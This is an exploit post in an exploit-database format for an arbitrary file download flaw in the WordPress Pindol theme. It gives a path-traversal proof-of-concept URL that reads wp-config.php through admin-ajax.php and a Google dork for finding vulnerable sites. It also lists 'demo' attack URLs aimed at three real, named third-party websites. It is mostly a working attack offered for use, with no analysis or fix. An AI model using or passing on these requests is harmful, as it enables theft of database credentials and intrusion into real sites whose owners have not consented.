id: 23144
date: 01/18/2015
title: Wordpress Theme Pindol Arbitrary File Download Vulnerability
author: terrorist
cves: 

######################
# Exploit Title: Wordpress Theme Pindol Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist from GHC (Georgian Hacking Community)
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/pindol/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

#Demo

http://koeln-fotostudio.de/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://tailwind.to/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-24]  #